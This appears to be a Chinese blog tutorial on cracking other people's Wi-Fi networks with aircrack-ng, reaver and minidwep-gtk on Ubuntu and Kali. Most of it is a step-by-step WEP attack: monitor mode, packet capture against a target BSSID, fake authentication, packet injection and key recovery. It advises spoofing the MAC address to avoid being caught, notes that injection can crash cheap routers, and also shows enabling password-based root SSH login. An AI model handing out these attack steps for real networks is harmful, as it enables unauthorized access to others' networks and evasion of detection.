使用minidwep-gtk

使用minidwep-gtk

【1】wifi破解 【2】ubuntu14.0.4安装步骤 【3】Ubuntu下Aircrack-ng工具包的使用 【4】常用芯片类型 【5】kali2019安装

【1】wifi破解 1.wep加密:此类加密比较老旧,现在的无线路由器已经很少使用此类加密方式,破解只需要大量的数据包即可。 2.WPA / WPA2 PSK加密:这类加密是很安全的,破解的方式是抓握手包然后跑字典。 3.一部分路由器为了方便用户,设置了QSS快速连接功能(或者叫WPS功能)。破解方式是抓握手包跑字典和跑PIN码2种。

【2】ubuntu14.0.4安装步骤 原文连接

安装依赖 sudo apt-get install build-essential libssl-dev iw libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev libssl0.9.8 libnl libnl-dev安装aircrack-ng-1.1

tar xvf aircrack-ng-1.1.tar.gz -C ./

cd aircrack-ng-1.1

#修改common.mak 这个文件,找到:

CFLAGS ?= -g -W -Wall -Werror -O3

修改为:

CFLAGS ?= -g -W -Wall -O3

#开始安装:

sudo make

sudo make install

#错误解决(Run ‘airodump-ng-oui-update’ as root (or with sudo) to install or update Airodump-ng OUI file (Internet connection required).) sudo airodump-ng-oui-update

#ubuntu 中 aircrack-ng 使用教程

1、启动无线网卡的监控模式,在终端中输入:

sudo airmon-ng start wlan0 #wlan0是无线网卡的端口,可用命令 ifconfig 查看

2、查看无线AP在终端中输入:

sudo airodump-ng mon0 #mon0 是启动监控模式后无线网的端口(虚拟网卡),查看有哪些采用wep加密的AP在线,然后按 ctrl+c 中止,不要关闭终端。

3、抓包,打开另一个终端,输入:

airodump-ng -c 7 -w wep --bssid CC:08:FB:8C:1E:67 mon0 #-c 后面跟着的6是要破解的AP工作频道,–bissid后面跟着欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地址,DATA保存的文件名可随便命名

4、与AP建立虚拟连接,再打开一个新终端,输入:

sudo aireplay-ng -1 0 -a AP’s MAC -h My MAC mon0 #-h后面跟着的My MAC是自己的无线网卡的MAC地址,即ifconfig命令下wlan0对应的mac地址

5、进行注入,成功建立虚拟连接后输入:

sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My MAC mon0 #现在回头看下步骤3的终端是不是DATA在开始飞涨!(那串ff照抄就行)

6、解密,收集有15000个以上的DATA之后,另开一个终端,切换到aircrack-ng-1.1目录,执行以下命令

sudo aircrack-ng wep*.cap #进行解密,如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多15000个之后就自动再运行,直到算出密码为至,注意此处文件的名字要与步骤3里面设置的名字一样,且*号是必需的

7、收工,破解出密码后在终端中输入

sudo airmon-ng stop mon0 #关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。

8、如果要卸载ubuntu 上的aircrack-ng,可切换到aircrack-ng-1.1 目录,执行

sudo make uninstall

安装reaver-1.4

cd reaver-1.4

cd src

./configure

sudo make

sudo make install

安装minidwep-gtk-40420-ubuntu-64bit sudo dpkg -i minidwep-gtk-40420-ubuntu-64bit.deb #运行软件 sudo minidwep-gtk

常见错误

1.avahi-daemon进程导致网卡监控模式无法打开

#Avahi 是 zeroconf 协议的实现。它可以在没有 DNS 服务的局域网里发现基于 zeroconf 协议的设备和服务。它跟 mDNS 一样。除非你有兼容的设备或使用 zeroconf 协议的服务,否则应该关闭它。

/etc/init.d/avahi-daemon stop or service avahi-daemon stop

【3】Ubuntu下Aircrack-ng工具包的使用 原文链接

安装:$sudo apt-get install aircrack-ng

Aircrack-ng无线破解工具包有很多工具,用到的工具主要有以下几个:

airmon-ng处理网卡工作模式

airodump-ng抓包

aircrack-ng破解

aireplay-ng发包,干扰

1)airmon-ng,启动无线网卡进入Monitor模式,

useage:airmon-ng[channel]

:启动,停止,检测

:指定无线网卡

[channel]:监听频道,现代大多数无线路由默认是6,随便扫描一下都是这个频道,网管们应该换换了

2)airodump-ng,抓包工具,详细用法如下:

usage:airodump-ng[,,...]

Options:

–ivs:仅将抓取信息保存为.ivs

–write:保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分

–beacons:保存所有的beacons,默认情况况下是丢弃那些无用的数据包的

Filteroptions:

–encrypt:使用密码序列过滤AP

–netmask:使用掩码过滤AP

-bssid:使用bssid过滤AP

-a:过滤无关的客户端

–help:显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文

3)aireplay-ng,搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的AP设备(小内存的路由器可能会重启,或者彻底被破坏掉)

usage:aireplay-ng

Filteroptions:

-bbssid:AP的MAC

-ddmac:目标的MAC

-ssmac:来源的MAC

-mlen:最小包长度

-nlen:最大包长度

-D:禁用AP发现功能

Replayoptions:

-xnbpps:每秒包数量

-pfctrl:框架设定(hex)

-abssid:设置AP的mac

-cdmac:设置目标的MAC

-hsmac:设置来源的mac

-gvalue:改变环缓存大小(默认8)

Fakeauthattackoptions:

-eessid:设置目标AP的SSID

-onpckts:每秒爆破的包数量(0自动,默认1)

-qsec:存活时间秒

-yprga:共享可信的key流

–help:显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付那些不给出作者就引用的人,鄙视抄袭.

4)aircrack-ng,破解KEY,漫长的过程.漫不漫长取决于两个方面:一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.

usage:aircrack-ng[options]<.cap/.ivsfile(s)>

Commonoptions:

-a:暴破(1/WEP,2/WPA-PSK)

-e:选择essid为目标

-b:选择ap的mac为目标,就是破解识别的关键字

-q:使用安静模式,无数出模式

-C:将所有的AP合并为一个虚拟的

–help:显示这个帮助

#就WEP破解说明,步骤:

1.修改无线网卡状态:先down掉

2.伪造无线网卡的MAC地址:安全起见,减少被抓到的可能

3.修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡

4.修改无线网卡状态:up

5.查看网络状态,记录下AP的MAC和本机的MAC,确定攻击目标

6.监听抓包:生成.cap或.ivs

7.干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包

8.破解.cap或.ivs,获得WEP密码,完成破解

【4】常用芯片类型 用于抓取无线数据包稳定和兼容比较好的三款芯片: 1.RT3070(L)/RT5572:即插即用支持混杂模式、注入模式、AP模式。 2.RT8187(L):即插即用支持混杂模式、注入模式、AP模式。 3.AR9271:即插即用支持混杂模式、注入模式、AP模式。 对于Linux(像Ubuntu、Kali、Debian、Centos等等),这三款芯片即插即用,无需再手动安装驱动。

以下是一些可以在kali上正常工作的芯片组: Atheros AR9271 Ralink RT3070 Ralink RT3572 Realtek 8187L (Wireless G adapters) Realtek RTL8812AU (2017年新增) Ralink RT5370N

CDLINUX支持的芯片 雷凌Ralink 3070芯片 瑞昱Realtek 8187L芯片

【5】kali2019安装 Kali下载地址 安装教程

#Kali Linux 镜像 各个版本之间的区别

按处理器架构来划分的话,有 64 bit、32 bit、armhf、armel等版本。加light的是轻量版。

e17、Mate、LXDE等是不同的桌面环境。

Kali Linux 2016.2 支持GNOME、KDE、Mate、LXDE和Enlightenment等桌面环境。

#kali2019.2 安装要求,vmware15

配置静态IP开启ssh

#修改sshd_config文件

vim /etc/ssh/sshd_config

将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes

将PermitRootLogin without-password修改为PermitRootLogin yes

#重启ssh

service ssh restart

#开机启动

update-rc.d ssh enable //系统自动启动SSH服务

update-rc.d ssh disabled // 关闭系统自动启动SSH服务

ll命令不能使用

#修改.bashrc文件

vim ~/.bashrc

alias ll='ls -l' #添加别名

source ~/.bashrc

安装rtl8812au驱动

#配置apt源

vim /etc/apt/sources.list

deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

apt-get update

apt install realtek-rtl88xxau-dkms

#设置usb3.0并重启

安装minidwep-gtk-40420-ubuntu-64bit sudo dpkg -i minidwep-gtk-40420-ubuntu-64bit.deb #运行软件 reboot sudo minidwep-gtk

相关推荐

如何在支付宝上免费领流量
哪个才是365官网

如何在支付宝上免费领流量

⌛ 11-04 👁️ 4182
上海博物馆
38365365.com打不开

上海博物馆

⌛ 08-08 👁️ 5323